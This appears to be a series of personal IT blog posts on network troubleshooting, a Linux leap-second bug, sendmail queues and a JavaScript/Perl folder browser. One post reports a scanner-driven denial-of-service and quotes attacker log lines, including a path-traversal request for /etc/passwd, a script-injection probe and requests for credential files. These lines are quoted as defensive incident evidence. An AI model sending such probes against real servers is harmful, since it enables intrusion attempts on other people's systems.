Categories
DNS IT Operational Excellence Network Technologies

The IT Detective Agency: Roku player can’t connect to Internet

Intro
I bought a used Roku player, just to try it out. Things didn’t go right at first.

The details
Setting it up, I got to the point where it tests its Internet connection. There are three status lights. The first two were OK, but the Internet connection returned an error, I think error #9. It didn’t matter whether I used a wired or wireless connection.

I have an unusual Internet router at home, a Juniper SSG5. All my other devices behind that router were reaching the Internet just fine, however. Long story short, it turns out there was a slight DNS misconfiguration: the Juniper had itself listed as the secondary DNS server, and there was no primary DNS server at all. Why this only affected the Roku is still a mystery.

I updated the Juniper config to use 4.2.2.3 as the primary DNS server, and the Roku connected just fine – wirelessly as well.
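
For the record, on the SSG5 (ScreenOS) that fix is a couple of CLI lines – something like the following, going from memory, with 4.2.2.4 thrown in only as an example secondary:

set dns host dns1 4.2.2.3
set dns host dns2 4.2.2.4
save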

Case closed!

Conclusion
Well, as a network type-of-guy, I would have appreciated access to the Roku Linux OS so I could have seen for myself what was going on. I’m sure I would have figured out the problem much sooner than I did. The error message was not particularly helpful, and most of the online discussions attribute that error to causes other than the DNS issue discovered here. Short of OS access, more robust debugging tools, such as PING, would have been mighty handy.

Categories
Admin Security Web Site Technologies

DOS Attack from South Korea

Intro
Last week I witnessed a denial-of-service (DOS) attack against a web server. This is disconcerting, to say the least. I felt that by putting the information out in the open, some leverage might be applied to the party responsible for that server or subnet.

The source of the attack was a single IP, 58.180.70.160.

Some Details
The attack occurred July 31st.

It consisted of over 100,000 object accesses.

I do not see evidence of an actual hack.

It lasted about 10 hours, from 12:30 PM EDT to 10:57 PM, with a few preliminary accesses starting at 4 AM before the onslaught at noon.

Clearly some kind of tool was used. It is very aggressive around forms, doing lots of variations in its POST to the same form, over and over. Here’s one small snippet that gives the flavor:

58.180.70.160 - - [31/Jul/2012:22:53:05 -0400] "POST /[omitted]/forgot_password.jsp../../../../../../../../../../etc/passwd/./././././././././././[pattern repeated - total URI is over 4000 characters!]

Then there’s the fishing around for files which, if present, could become a vector for attack, like these lines:

58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /qlc9tjIqjR.cfm HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "GET /_vti_pvt/authors.pwd HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET / HTTP/1.1" 200 9491 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "GET /crossdomain.xml HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "GET /solr/select/?q=test HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /inexistent_file_name.inexistent0123450987.cfm HTTP/1.1" 404 292 "-" "<script>alert(12345)</script>" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET http://www.acunetix.wvs HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /index HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /server-info HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "POST /_vti_bin/shtml.exe?_vti_rpc HTTP/1.1" 405 124 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"

The line mentioning Acunetix is, I think, the key to understanding this attack. It is leaving a bread-crumb trail to let the attacked site know what tool was used: the Acunetix WVS Free Edition scanner.

So it’s a semi-legitimate tool, or at least one openly referenced by Google. But in the hands of a malicious or simply ignorant user, such a tool really does become a DOS weapon. Its aggressive POSTs often have consequences for back-end databases. A medium-duty site is typically not tuned to handle 8,000 POSTs per hour, which is the rate they came in – over two per second. So the site can be tied up servicing these POSTs and not have resources left over to handle legitimate requests.

To get some background on where this originated and from whom, I did a whois search on ARIN, the main Internet address space registry. That told me the address space has been delegated to APNIC, the Asia-Pacific NIC. So I did a whois search on APNIC. That showed me that the range is in turn delegated to the Korea NIC! So it’s off to KRNIC and their whois… That in turn gave me the most specific information of all:

More specific assignment information is as follows.
 
[ Network Information ]
IPv4 Address       : 58.180.68.0 - 58.180.71.255 (/22)
Network Name       : SHINBIRO-INFRA
Organization Name  : ONSE Telecom
Organization ID    : ORG2324
Address            : 2F Bundang Center, Onse IDC, 235-230, 
Zip Code           : 448-500
Registration Date  : 20081107
Publishes          : Y
 
 See the Contact Info
[ Technical Contact Information ]
Name               : IP Manager
Organization Name  : ONSE Telecom
Zip Code           : 448-500
Phone              : +82-2-1666-0120
E-Mail             : [email protected]
 
 
- KISA/KRNIC Whois Service -

Obviously it doesn’t get so specific that it tells me who owns the attacking host, but the mentioned subnet, 58.180.68.0/22, is not too big, all things considered, so that’s quite specific compared to where we were when we started our journey. It seems that it’s administered by ONSE Telecom in South Korea.

I tried to contact them by email – the email bounced. I also wrote to [email protected], which also bounced.

KRNIC is run by KISA, which claims to be an Internet security enterprise (fat chance in my book). I filled out their online contact form – it consistently failed to accept my message, no matter how simple I made it.

At this point I decided that this was too many offenses. The owners of that subnet, 58.180.68.0/22, are not playing by the rules of the Internet, and they should be cut off from the Internet until they follow the rules.

So I set up rules to discard all packets from subnet 58.180.68.0/22 and I recommend that others do the same on their web sites.
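
On a Linux web server, for example, a single iptables rule does the job (adapt to whatever firewall you actually run):

$ iptables -A INPUT -s 58.180.68.0/22 -j DROP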

Amazon Cloud not very sophisticated with regards to security
I initially tried to take my own advice and sought to put the above subnet into a deny security rule on my Amazon cloud service. I work with firewalls, and this sort of thing is commonplace and has been around for well over 15 years. But you can’t do it with the Amazon Cloud security service! I was shocked. They have so many sophisticated services and have clearly thought out this “cloud thing” better than just about anyone, but they didn’t stop to listen to customer requests on this basic security issue – an allow-all-except-these-subnets type of capability.

Conclusion
A DOS was observed emanating from a host in South Korea using Acunetix’s free WVS scanner. The owner of the subnet does not post legitimate contact information and should be banned from Internet connectivity for this egregious behaviour which was perpetrated using its address space.

Categories
Admin Linux SLES

The IT Detective Agency: A couple of our SLES servers are running very slowly

Intro
Sometimes truth is stranger than fiction, even in the IT realm. I actually had a mere supporting role in this case – credit must be given to my persistent and accomplished friends for finding the root cause.

This unlikely case begins with a serendipitous accident
An incident accidentally gets assigned to me about a couple of application servers running slowly – the echo of command-line typing comes in fits and starts. Well, I quickly decide it’s not my issue and look around to see who should handle it. Probably the network specialist, right? No other server is having this issue, and the servers with the issue are responding fine to PING on their local segment. But still, it sounds like a network problem – for instance, an interface with duplex settings mismatched against its switch port.

But I decide to be nice about it and approach the guy with the problem, “Freg,” and ask him what he thinks should be done with the ticket. He takes the opportunity to show me the problem in person. So I listen to his story and politely look. This took place on July 31st, mind you (yesterday). No one had been using these servers until they tried that day – and now they are too slow to use. The last time they were used was about 50 days ago, and they were fine then. There are two servers with a similar problem.

And it goes on like that. These are running an ERP app which starts a Java process. Both of these servers are VMs. So lots of facts are being thrown at me. Maybe some are relevant and some not. I have never heard of these servers and am not familiar with the app. No root access is available to us, but we can log on as the same user who runs the ERP app.

I do an uptime. It’s up 54 days. More importantly, the load average is very high – 25, and pinned there, because the 5- and 15-minute averages are also around 25. I now feel comfortable explaining the slow character-typing echo. So it’s not a network problem after all… Talk to a sysadmin is my advice. But he sits there expecting me to do more, to somehow offer something helpful…

So I hem and haw and do essentially the one thing I know how to do in these circumstances: run strace. I get the process number of the offending process and try to get some insight into what it’s spending its time on. I don’t do this very often, and when I do I usually don’t learn very much, but it is another piece of the puzzle: I end up knowing more than when I started out. Let’s say the process number was 26743; then I ran:

> strace -f -p 26743

and simply watched the output. The output was weird. It was filled with calls to a function I’d never seen before: futex. In fact it was all futex calls – looping, rapidly, the same call over and over, producing timeout errors.

You can look in section 2 of the man pages:

> man -s2 futex

on a Linux system and see for yourself that futex is the fast userspace locking system call. Don’t ask me – I’d say it’s a kernel thing. But it intuitively doesn’t seem right that a program would burn excessive amounts of CPU doing nothing but this one system call. A healthier program will be seen making a nice variety of calls, especially network-related ones like open, read, socket, gethostbyname, etc.

A popular cause ruled out
I also checked out /etc/resolv.conf. It often happens that a sysadmin messes that file up with an invalid nameserver – or even, as I saw just the other day, a nameserver line that omitted the nameserver directive and contained only the IP address of the nameserver! The symptom of that is different: the initial login prompt comes up slowly (as the server times out doing a reverse lookup on your source IP address), but character echo after that is normal.
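
For reference, a healthy /etc/resolv.conf looks something like this (the addresses and domain here are just placeholders); the broken variant I mentioned had a bare IP on a line with no nameserver keyword in front of it:

search example.com
nameserver 10.0.0.53
nameserver 10.0.0.54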

The leap second
Other ideas for isolating the problem: reboot, but turn off this process at start-up. I think the reboot did help. But our sysadmin found that in fact this is a known issue on SUSE Linux (SLES).

From the SUSE support note on the subject we learn that a leap second was added June 30th, 2012, and that there is a problem associated with it. It “can cause applications that are using FUTEXes to consume 100% of CPU. The issue is present in all Linux kernel versions >= 2.6.22, therefor affecting SLES 11 SP1 and later releases.” Wow!

The remedy in that case is to execute the command

$ date -s "$(LC_ALL=C date)"

to trigger a clock_was_set() system call. We did this and it seems to have fixed our issue.

Case closed.

Conclusion
The best sleuthing involves multiple people looking at things. Sometimes their individual breakthroughs need to be combined. Here the incidental observation of futex calls helped tie a CPU problem to a kernel bug related to the leap second implementation. This also explains why the problem did not exist 50 days ago – that was before June 30th.

Categories
Admin Internet Mail Linux

Yahoo! stopped accepting emails – what we can learn about sendmail from this

Flash Update
I noticed yahoo.com, yahoo.ca and yahoo.com.br had stopped accepting emails today.

I wanted to provide insight into this problem that few others would have, namely, when did the problem first occur?

I looked at my stuck messages in queue. I realized that with sendmail, there is no easy way to answer the question: what is the oldest stuck message for domain XYZ in the queue? So I rigged up something, very crude, but typical for a Unix command line-type of guy.

Namely:

$ grep yahoo */qf*|grep for|cut -d\; -f2|sort|head
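
Spelled out with comments – this assumes the usual sendmail queue layout, where each queued message has a qf control file whose Received: header contains “for <recipient>; <date>” – the pipeline does this:

grep yahoo */qf* |   # find qf control files mentioning yahoo
  grep for |         # keep the Received: lines, which contain "for <recipient>; <date>"
  cut -d\; -f2 |     # split on the semicolon and keep the date portion
  sort | head        # string-sort the dates and show the oldest few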

The answer? My first stuck message comes from 12:43:46 EDT today (July 31st). As of this writing, 3:53 PM, the problem still exists, which already makes it quite a long outage even if it is fixed in the next few minutes. Just minutes later, around 4 PM, I noticed a lot of the messages being delivered, so the problem seems to have finally cleared up.

The expression above works if you are root and the current directory is, e.g., /mqueue, under which you have queue directories q0, q1, …, q9, etc corresponding to an MC statement:

define(`QUEUE_DIR',`/mqueue/q*')dnl

The grep above might miss a few messages, but if you have lots of them, as I do, it doesn’t really matter, as its purpose is just to convey the general idea of when the problem started. In my case it can safely be assumed that I am continuously sending emails to yahoo.com, so there is no uncovered window of more than ten minutes or so during the day.

Conclusion
We helped document a complete three-hour outage of Yahoo mail. Along the way we learned of a deficiency in sendmail’s mailq command – how limited its reporting options are. We compensated for that by rolling our own series of commands to answer the question of what is the oldest mail of this type in our queues.

Categories
JavaScript Linux Perl

A simple Perl script to build JavaScript folder objects

Part 2
Intro
This is the 2nd part in a two-part blog where I present a simple example of a JavaScript folder browser. In Part 1 I provided all the JavaScript required. By itself it may have seemed an academic exercise, but once you appreciate that it isn’t hard to write a program which creates the JavaScript objects from your server’s directory structure, well, now you have something that’s pretty powerful and useful.

The details
I considered writing this in Python, which seems to be a more current language, but old habits die hard as they say. I just know Perl too well to suffer the pain of learning all those neat tricks all over again in another language. Maybe someday I’ll re-write it in Python.
Notice the recursion through the directories? I first used that 17 years ago! Why throw out good code?

Here is the code, which I named scan.pl:

#!/usr/bin/perl
# DrJ - 7/2012
# scan picture-containing directories using recursion and build javascript objects from them
use Getopt::Std;
getopts('d:j:');
$homedir = $opt_d;
$jsfile = $opt_j;
usage() if ! $opt_d || ! $opt_j;
$DEBUG = 0;
print "Homedir: $homedir, jsfile: $jsfile\n";
open(JS,">$jsfile") || die "Cannot open JavaScript file: $jsfile!!\n";
$date = `date +%D`;
($homedirnoslash) = $homedir =~ /^\/(.+)/; # assumes leading "/"
 
# print opening of function
print JS qq#function init() {
// Generated data from scan.pl - DrJ $date
folder['browse'] = {path:'',depth:0,kids:['$homedirnoslash']};
#;
 
# get things going with our recursive function
traverse($homedir,0);
 
# closing statement
print JS qq(}\n);  # close of init JavaScript function
close(JS);
 
sub traverse {
my ($dir,$depth) = @_;
my @kids = ();
print "Traverse. dir: $dir\n" if $DEBUG;
opendir(DIR, $dir) || die "Cannot open dir $dir!!\n";
foreach (readdir(DIR)) {
  next if $_ eq '.' || $_ eq '..';
  print "Traverse. file: $_\n" if $DEBUG;
  $path = "$dir/$_";
  if (-d $path) {         # a directory
# we want only the last part of the path
    (my $lastpath) = $path =~ /([^\/]+)$/;
    push(@kids,$lastpath);
    traverse($path,$depth + 1); # recurse!
  } elsif ($_ =~ /$filespec/) {     # placeholder for per-file handling (e.g., images); $filespec is not set in this version
  }
} # end loop over files in this directory
# write out the JS objects
print JS qq(folder["$dir"] = {path:"$dir",depth:$depth,kids:[);
my $i = 0;
# kids are in jumbled order.  Do regular sort on them.
foreach (sort @kids) {
  $comma = $i++ > 0 ? "," : "";
  print JS qq($comma"$_");
}
# end of object. close it out.
print JS qq(]};\n);
} # end sub traverse
#
sub usage {
  print "usage: $0 -d root_directory -j JavaScript_output_file\n";
  exit(1);
}

It’s pretty self-explanatory. Call it like this, for example:

> ./scan.pl -d /homepic -j init.js

and it produces an init.js file filled with an init() function and all the necessary folder objects, assuming the top-level folder to browse is /homepic.

My init.js looks like this:

function init() {
// Generated data from scan.pl - DrJ 07/27/12
 
folder['browse'] = {path:'',depth:0,kids:['homepic']};
folder["/homepic/pictures_chronological/2011_06"] = {path:"/homepic/pictures_chronological/2011_06",depth:2,kids:[]};
// lots more lines like this omitted
folder["/homepic"] = {path:"/homepic",depth:0,kids:["kodak_pictures","pictures_chronological"]};
}

And I tested it in browse13.html, which looks just like browse12.html, except I got rid of the init() function and added an include line at the top:

<html>
<head>
<script type="text/javascript" src="init.js"></script>
...

I am a little concerned about performance. This clearly isn’t designed to scale to tens of thousands of directories, but will it be sufficiently fast for my purposes? My init.js is 213 lines and about 25 KB in size. browse13.html which calls it loads fast and runs fast. So, yes, success!

Part 1, A Simple Javascript Folder Browser

Conclusion
We have created a fairly powerful and general-purpose folder browser out of fairly simple usage of JavaScript and Perl. It makes an ideal base upon which to build further.

Categories
Apache JavaScript Perl

A Simple Javascript Folder Browser

Part 1

Intro
I haven’t posted much lately. I’ve been tied up creating this folder browser using client-side JavaScript. I probably made every mistake in the book, but I worked through them all and the outcome is pretty cool, if I say so myself! It works in IE, Firefox and even on a Blackberry!

The details
I broke down the development of this browse app into 12 stages. Given time, I might show the progression of my thinking as each version becomes closer and closer to fulfilling all initial objectives. But who has time? I’ll show the source for browse3.html, warts and all, and then skip many iterations and jump to showing the final source, browse12.html.

Browse3.html
It ain’t pretty. It isn’t even correct. But it “does stuff.” It assumes the Apache web server is running and “borrows” the closed and open folder icons from Apache’s /icons directory. In my case I have a top-level directory called /homepic, with folders under that and sub-folders under those, which I want the ability to browse and, ultimately, act on – such as displaying all of a folder’s images in the image viewer I wrote earlier.

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
// global object
var folder = new Object;
function displayDate()
{
document.getElementById("demo").innerHTML=Date();
}
function init() {
// big initialization - generated code from perl perusal of directories
// see http://www.quirksmode.org/js/associative.html
//  var folder = new Object;
// we need this empty assignment to extend object with subproperties later on
  folder['homepic'] = '/homepic';
  //folder['/homepic'].path = '/homepic';
  folder.homepic.state = 'closed';
  folder[0] = '/homepic/kodak_pictures';
  folder[1] = '/homepic/pictures_chronological';
  folder['/homepic/kodak_pictures'] = '/homepic/kodak_pictures';
  folder['/homepic/kodak_pictures'].state = 'closed';
  //folder['/homepic/kodak_pictures'].path = '/homepic/kodak_pictures';
  folder['/homepic/pictures_chronological'] = '/homepic/pictures_chronological';
  folder['/homepic/pictures_chronological'].state = 'closed';
  //folder['/homepic/pictures_chronological'].path = '/homepic/pictures_chronological';
  var child = 'homepic';
  var cstate = folder['homepic'].state;
  var cpath = folder[0];
}
function browse(f) {
document.getElementById("demo").innerHTML="folder: "+f+" ";
var icon;
var imgid;
var fname;
if (f == "browse") {
// see http://www.quirksmode.org/dom/intro.html#create
// one-time initialization
  init();
  document.getElementById("browse").innerHTML='';
  icon = document.createElement('IMG');
  icon.src = "/icons/folder.gif";
  icon.id = "icon-/homepic";
  icon.onclick = Function('browse("/homepic")');
  document.getElementById("browse").appendChild(icon);
  var divfolder = document.createElement('DIV');
  divfolder.id = "/homepic";
  document.getElementById("browse").appendChild(divfolder);
  var x = document.createTextNode('homepic');
  document.getElementById('/homepic').appendChild(x);
  //document.getElementById("browse").innerHTML='<img id="homepic" onclick="browse(\'homepic\')" src="/icons/folder.gif">ho
mepic<br>';
} else {
  imgid = 'icon-' + f;
// change img to one of open folder
  document.getElementById(imgid).src = "/icons/folder.open.gif";
  // nope? imgid.src  = "/icons/folder.open.gif";
  for (i=0;i<3;i++) {
    icon = document.createElement('IMG');
    icon.src = "/icons/folder.gif";
    fname = folder[f].children[i];
    //fname = folder['homepic'].children[i];
    icon.id = "icon-" + fname;
    icon.onclick = Function('browse('+fname+')');
    document.getElementById(f).appendChild(icon);
    var divfolder = document.createElement('DIV');
    divfolder.id = fname;
    document.getElementById(f).appendChild(divfolder);
    var x = document.createTextNode(fname);
    document.getElementById(f).appendChild(x);
  } // end loop over children
}
}
// note variable # or arguments are being passed
function  openfolder()
{
var f = arguments[0];
var dir = "/icons/";
var fopen = "folder.open.gif";
var fclosed = "folder.gif";
var folder = document.getElementById(f);
var ftype = folder.src;
// src includes http... Get rid of stuff in front
var patt = /.*(folder.+)/;
var ftypebare = ftype.replace(patt,"$1");
// for debugging
document.getElementById("demo").innerHTML="folder: "+f+" "+ftypebare;
if (ftypebare == fopen) {
// close folder and remove sub-folders
  folder.src = dir+fclosed;
  document.getElementById("homepic/pictures_chronological").innerHTML='';
} else {
// open up folder and reveal sub-folders
  folder.src = dir+fopen;
  for (var i = 0; i < arguments.length; i++) {
    var placeid = arguments[i];
    var srcid = '/' + placeid;
    document.getElementById(placeid).innerHTML='&nbsp;&nbsp;&nbsp;<img id="' + srcid + '" onclick="openfolder(\'pictures_chronological\')" src="/icons/folder.gif"/> pictures_chronological<br>';
  }
}
 
}
</script>
</head>
<body>
 
<h1>Folder Browser</h1>
<p id="demo">Debug Aid.</p>
<p id="browse"><a href="#" onclick='browse("browse")'>Folder Browser</a></p>
 
<img id="homepic" onclick="openfolder('homepic','homepic/pictures_chronological','homepic/canon_pictures')" src="/icons/fol
der.gif"/> homepic<br>
<div id="homepic/pictures_chronological"></div>
<div id="homepic/canon_pictures"></div>
<img id="cfolder2" onclick="openfolder(2)" src="/icons/folder.gif"/><br>
<img id="cfolder3" onclick="openfolder(3)" src="/icons/folder.gif"/><br>
<img id="cfolder4" onclick="openfolder(4)" src="/icons/folder.gif"/><br>
 
</body>
</html>

So you see in browse3 I’m wrestling with how to work with JavaScript objects (which I didn’t really know existed at that time). I badly wanted to give an associative array entry properties, as in the initialization line

folder['/homepic/kodak_pictures'].state = 'closed';

but I couldn’t find any examples on the Internet. I eventually learned that wasn’t a correct assignment.

So one of my biggest and most worthwhile lessons was to gain a decent understanding of JavaScript objects, which can hold multiple values, and of object properties.
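
To make the lesson concrete, here is a distilled illustration (not code from the browser itself) of why the string assignment fails and the object assignment works:

var folder = new Object;
// wrong: the entry is a plain string, so the property assignment is silently discarded
folder['/homepic'] = '/homepic';
folder['/homepic'].state = 'closed';   // folder['/homepic'].state is still undefined
// right: the entry is an object, so it can carry properties
folder['/homepic'] = {path:'/homepic', state:'closed'};   // folder['/homepic'].state is now 'closed'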

I tried to use Firebug for Firefox, with very limited success, but at least I could step through the JavaScript code and see which branch of a conditional was being executed compared to what I thought should be executed, which tipped me off to one vexing problem concerning opening and closing folders multiple times. Also, just looking up the error in Internet Explorer by double-clicking the warning sign in the corner was tremendously helpful.

So…skipping for now versions 4 – 11, we arrive at browse12.html:

Browse12.html

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
// global object
var folder = new Object;
function displayDate()
{
document.getElementById("demo").innerHTML=Date();
}
function init() {
// big initialization - generated code from perl perusal of directories
// I think my big breakthrough was to learn about Javascript objects and their properties
// from the book Javascript The Definitive Guide, 5th edition by D.Flanagan
// Some additional inspiration came from http://www.quirksmode.org/dom/intro.html#create
// folder is an associative array with properties path, state,depth and kids (which is itself an array)
// first entry is initial top-level to get things started
  folder['browse'] = {path:'',depth:0,kids:['homepic']};
// regular entries:
  folder['/homepic'] = {path:'/homepic',depth:1,kids:['kodak_pictures','pictures_chronological']};
// values for sub-folders
// /homepic/kodak_pictures
  folder['/homepic/kodak_pictures'] = {path:'/homepic/kodak_pictures',depth:2,kids:['2002_05','2002_06']};
// /homepic/pictures_chronological
  folder['/homepic/pictures_chronological'] = {path:'/homepic/pictures_chronological',depth:2,kids:['2011_11','2011_12']};
}
function browse(f) {
document.getElementById("demo").innerHTML="folder: "+f+" ";
var icon;
var imgid;
var fname;
var table;
if (f == "browse") {
// one-time initialization
  init();
}
 
imgid = 'icon-' + f;
if (!folder[f]) {
// folder not defined: must be a terminal folder. Do something here eventually
// but for now do nothing whatsoever
} else {
  if (folder[f].state === undefined || folder[f].state == 'closed') {
  // change img to one of open folder
    if (f == 'browse') {
      document.getElementById(f).innerHTML='';
    } else {
      document.getElementById(imgid).src = "/icons/folder.open.gif";
    }
    var kids = folder[f].kids;
    for(var i=0;  i < kids.length; i++) {
      table = document.createElement("table");
      table.border = 0;
      var row = document.createElement("tr");
      var td1 = document.createElement("td");
      var td2 = document.createElement("td");
      var td3 = document.createElement("td");
      icon = document.createElement("img");
      icon.src = "/icons/folder.gif";
      if (f == "browse") {
        fname = "/" + kids[i];
      } else {
        fname = f + "/" + kids[i];
      }
      icon.id = "icon-" + fname;
      if (folder[fname])
        folder[fname].state = 'closed';
      icon.onclick = Function('browse("'+fname+'")');
      td1.width = 27 + folder[f].depth*27;   // indent child entries according to the parent folder's depth
      td1.align = "right";
      td1.appendChild(icon);
      var node = document.createTextNode(kids[i]);
      td3.appendChild(node);
      row.appendChild(td1); row.appendChild(td2); row.appendChild(td3);
      table.appendChild(row);
      document.getElementById(f).appendChild(table);
      var divfolder = document.createElement("div");
      divfolder.id = fname;
      document.getElementById(f).appendChild(divfolder);
      folder[f].state = 'open';
    } // end loop over children
  } else {
  // set folder to closed state
  // this innerHTML nullification is kind of a kludge, but it works
    document.getElementById(f).innerHTML='';
    document.getElementById(imgid).src = "/icons/folder.gif";
    folder[f].state = 'closed';
  } // end conditional over folder state
} // end condition over whether folder is defined or not
} // end function browse
 
</script>
</head>
<body>
 
<h1>Folder Browser</h1>
<p id="demo">Debug Aid.</p>
<p id="browse"><a href="#" onclick='browse("browse")'>Folder Browser</a></p>
</body>
</html>

That’s it! Not bad, huh? I plan to generate the init() function periodically and automatically from a Perl script which peruses my directories.

I could have used Ajax and generated the subfolder information on the fly as it is needed – not that I know how, I just know enough to know it is possible and therefore I could do it – but I thought this method of pre-loading all the information might be a little more efficient. If this were a folder and file browser it would be different, but for now it is just a folder browser.

So the main revelation is that I had to set my associative array members to be objects during initialization, as in

folder['/homepic'] = {path:'/homepic',depth:1,kids:['kodak_pictures','pictures_chronological']};

and one of the object values is itself an anonymous array that holds the sub-folders.

Buying an actual book was probably a good move. I went with JavaScript: The Definitive Guide, 5th edition. Note that this is not the latest edition – the 6th – but this way I could buy the book used for a lot less and not get myself further confused by HTML5, which I am not ready to tackle and which many browsers do not yet fully support. The book is pretty heavy going; the discussion of the DOM was particularly difficult, and the examples too few and too removed from the real world. But the core JavaScript discussion made a lot of sense to me, so it was by itself worth the purchase price.

In my next post I’ve posted the Perl script which can generate the folder object initialization.

Part 2, A simple Perl script to build JavaScript folder objects

Conclusion
In this part one of a two-part post I’ve provided the JavaScript that implements a very compact folder browser. It has been tested on both IE and Firefox. The second part of this series provides the Perl code generator that automates creation of the JavaScript folder objects.

Categories
Admin Network Technologies

The IT Detective Agency: Two of our sites got cut off!

Intro
I sometimes consult for the networking group of a large company. This incident really happened. I don’t know that it could ever happen again to anyone else, but it’s so bizarre that I just had to document it as an example of “you wouldn’t believe it unless you had actually been through it yourself.”

Let’s get into it
This company has lots of small and mid-sized offices connected via MPLS. WAN services are provided by a single telecom throughout the country. I feel obliged to not divulge specifics here. Let’s call the telecom “OE” as in over-extended.

So just before lunch yesterday they tell me that no PCs at one of their sites can access the Internet, and this information is coming from a very reliable source. It also comes out that a second site is similarly affected. It kind of sounds like a WAN problem, but no other sites are affected. In the old days you’d almost certainly know to look at the WAN, but these days it’s a little more complicated. Everyone’s PC is in AD, and the desktop group has the ability to push a GPO to all PCs at a site, so you just never know whether they were involved in messing them up.

So they tell me they can PING their corporate Intranet server. Fine. But they cannot telnet to port 80. Newsflash: how did they get telnet enabled in Windows 7? I mentally stored that question for my continuing education. Crises are also great learning/teaching moments, if you are of that frame of mind!

Ping is good. Of course I test the Intranet server myself, iwww.intranet. I can reach port 80 just fine. It happens that the front-end for iwww.intranet is a load balancer. I decide to do a trace using tcpdump. I’m not sure what I’ll find, but taking a trace is sort of a gut reaction in these cases. There’s lots of other traffic so we have to use a filter to see the tree in the forest. They give me the IP of the PC they’re testing from. My expression is something like this:

> tcpdump -i 0.0 host WKSTATION.AD.INTRANET

The 0.0 on this particular device is its way of saying use any and all interfaces.

Here’s what the output looks like:

11:51:03.852511 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de0a5), length 100
11:51:05.855446 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de101), length 100
11:51:06.187940 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de10b), length 100
11:51:08.857957 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de16d), length 100
11:51:09.184072 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de179), length 100
11:51:09.858865 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de198), length 100
11:51:14.855327 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de272), length 100
11:51:15.183349 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de27f), length 100
11:52:19.898380 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3decab), length 100
11:52:22.901684 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3ded28), length 100

I had never seen that before. I look up ESP and see it is related to IP protocol 50, which in turn is used in IPsec for VPN connections.

What the…?

Yeah. Let’s review. He’s sending TCP packets to port 80 of iwww.intranet, and all I’m seeing are these ESP packets, which aren’t even TCP. Of course the load balancer has no idea whatsoever what to do with those packets and simply does not respond to them.
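
Had I wanted to isolate just that traffic, a capture filter along these lines should do it – ESP is IP protocol 50:

> tcpdump -i 0.0 host WKSTATION.AD.INTRANET and ip proto 50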

What would you do? I felt the nail in the coffin would be to take a trace on the PC itself – to see what the packets look like when they’re coming straight out of the PC. But to be honest they never did make that trace. They didn’t have Wireshark installed, so it would have taken a while.

Meanwhile, the infrastructure folks are talking to each other and someone mentions that OE has a certain project, “runVPN,” that they’re rolling out. Now that sounds suspicious. In the imperfect world you have to work with what you have, not what you’d like to have. Based on our experience and educated hunches, we now feel pretty certain it’s gotta be a WAN problem caused by OE.

Within an hour OE confirms the problem is of their creation, and they have it fixed. They are very unhappy with the tech who caused it.

Conclusion
Sometimes things are what they appear to be. If you notice I didn’t do much to really help with the issue, and that’s all just about anyone can do when so much is outsourced. They did feel that my trace helped to convince the telecom that this really was their issue.

I guess they were encrypting WAN traffic on one end, but forgot to decrypt it on the other end. One of the strangest things to have on a production network.

Turning on telnet in Windows 7
Did I mention that they tested with telnet on Windows 7? They later explained how to enable it: go to Control Panel / Programs / Programs and Features / Turn Windows features on or off. There is an option for Telnet Client. Reboot (yes, you really need to reboot for this to take effect) and you’re good to go.
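
If you prefer the command line, the same thing can supposedly be done from an elevated prompt with dism – I haven’t tried this myself:

> dism /online /Enable-Feature /FeatureName:TelnetClient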

Categories
Admin Ajax Image Manipulation Web Site Technologies

How to create a Progressive Scrolling Web Gallery

Intro
I know, I know, there are thousands of ways to display your pictures on the web. I did a 60 second search and settled on one approach that looked interesting to me. Then I quickly ran into some limits and made some improvements. That’s why there are now thousands plus one more as of today! The app I improved upon is good for previewing pictures in a directory where there are lots of nice pictures. It makes the downloading more pleasant and shows large-ish thumbnail images that can be enjoyed in their own right while you wait for more images to download.

Thank you, Alexandru Pitea
So I just downloaded the stuff from his fine tutorial, How to Create an Infinite Scrolling Web Gallery. I unpacked the downloaded zip file: it worked the first time. That’s a good sign, right? That doesn’t always happen. Then I started to make changes and ruined it.

